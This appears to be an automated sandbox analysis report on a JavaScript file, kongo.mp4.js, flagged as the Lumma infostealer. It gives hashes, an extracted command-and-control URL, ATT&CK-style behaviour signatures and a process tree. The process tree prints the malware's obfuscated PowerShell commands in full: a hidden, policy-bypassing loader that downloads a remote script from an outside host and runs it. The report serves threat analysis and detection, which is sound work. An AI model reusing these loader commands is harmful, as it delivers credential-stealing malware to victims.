Analysis
-
max time kernel
96s -
max time network
144s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
-
submitted
08-01-2025 18:47
General
-
Target
kongo.mp4.js
-
Size
102KB
-
MD5
3c38beb47e908f44e723eeecc9263200
-
SHA1
aa1a371919fe804ab727bb65c1a7bb96224014a9
-
SHA256
9f31852148ac6004937ef640870d442afaa1a1064aa2cf540ec0db4827c8aee3
-
SHA512
46608dec2ca73d340fcefac08c74ed20a5395378777431d6a911b4192765946c09f8aa54485496341f12c9451f068a81e63c05197e4c83f51a32da98ef5967b4
-
SSDEEP
3072:uRKoa6RMqYPXIJOjW47hnrX2D45IbhmwOho2Big:uRFYPYU97hnrGD3mwOu2BN
Malware Config
Extracted
lumma
https://charminammoc.cyou/api
Signatures
-
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
-
Lumma family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Blocklisted process makes network request 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Suspicious use of SetThreadContext 1 IoCs
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 16 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\kongo.mp4.js2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAHcAJwAsACcAaABpAGQAZABlAG4AJwAsACcALQBlAHAAJwAsACcAYgB5AHAAYQBzAHMAJwAsACcALQBuAG8AcAAnACwAJwAtAEMAbwBtAG0AYQBuAGQAJwAsACcAZwBkAHIAIAAtACoAOwBTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEMAaQBVACAAKAAuACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAHwATQBlAG0AYgBlAHIAfABXAGgAZQByAGUALQBPAGIAagBlAGMAdAB7ACQAXwAuAE4AYQBtAGUALQBsAGkAawBlACcAJwAqAHQAKgBvAG0AKgBkACcAJwB9ACkALgBOAGEAbQBlACkALgBJAG4AdgBvAGsAZQAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAC4AUABzAE8AYgBqAGUAYwB0AC4ATQBlAHQAaABvAGQAcwB8AFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0AHsAJABfAC4ATgBhAG0AZQAtAGwAaQBrAGUAJwAnACoAbwBtACoAZQAnACcAfQApAC4ATgBhAG0AZQApAC4ASQBuAHYAbwBrAGUAKAAnACcATgAqAC0ATwAqACcAJwAsACQAVABSAFUARQAsACQAVABSAFUARQApACwAWwBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEMAbwBtAG0AYQBuAGQAVAB5AHAAZQBzAF0AOgA6AEMAbQBkAGwAZQB0ACkATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApADsAUwBlAHQALQBJAHQAZQBtACAAVgBhAHIAaQBhAGIAbABlADoALwBsAFcAIAAnACcAaAB0AHQAcABzADoALwAvAGsAbABpAHAAZABlAHIAaQBxAC4AcwBoAG8AcAAvAHMAaAAnACcAOwBbAFMAYwByAGkAcAB0AEIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACgARwBJACAAVgBhAHIAaQBhAGIAbABlADoAQwBpAFUAKQAuAFYAYQBsAHUAZQAuACgAKAAoACgARwBJACAAVgBhAHIAaQBhAGIAbABlADoAQwBpAFUAKQAuAFYAYQBsAHUAZQB8AE0AZQBtAGIAZQByACkAfABXAGgAZQByAGUALQBPAGIAagBlAGMAdAB7ACQAXwAuAE4AYQBtAGUALQBsAGkAawBlACcAJwAqAG4AbAAqAGcAJwAnAH0AKQAuAE4AYQBtAGUAKQAuAEkAbgB2AG8AawBlACgAKABWAGEAcgBpAGEAYgBsAGUAIABsAFcAKQAuAFYAYQBsAHUAZQApACkALgBJAG4AdgBvAGsAZQBSAGUAdAB1AHIAbgBBAHMASQBzACgAKQAnAA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://klipderiq.shop/sh';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wscript.exewscript kongo.mp4.js3⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.1MB
-
Filesize
6.8MB
-
Filesize
408KB
-
Filesize
1.1MB
-
Filesize
336KB
-
Filesize
136KB
-
Filesize
3.3MB
-
Filesize
1.1MB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
600KB
-
Filesize
136KB
-
Filesize
104KB
-
Filesize
5.6MB
-
Filesize
296KB
-
Filesize
6.5MB
-
Filesize
7.7MB
-
Filesize
1.4MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
216KB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
304KB
-
Filesize
408KB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
528KB
-
Filesize
512KB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB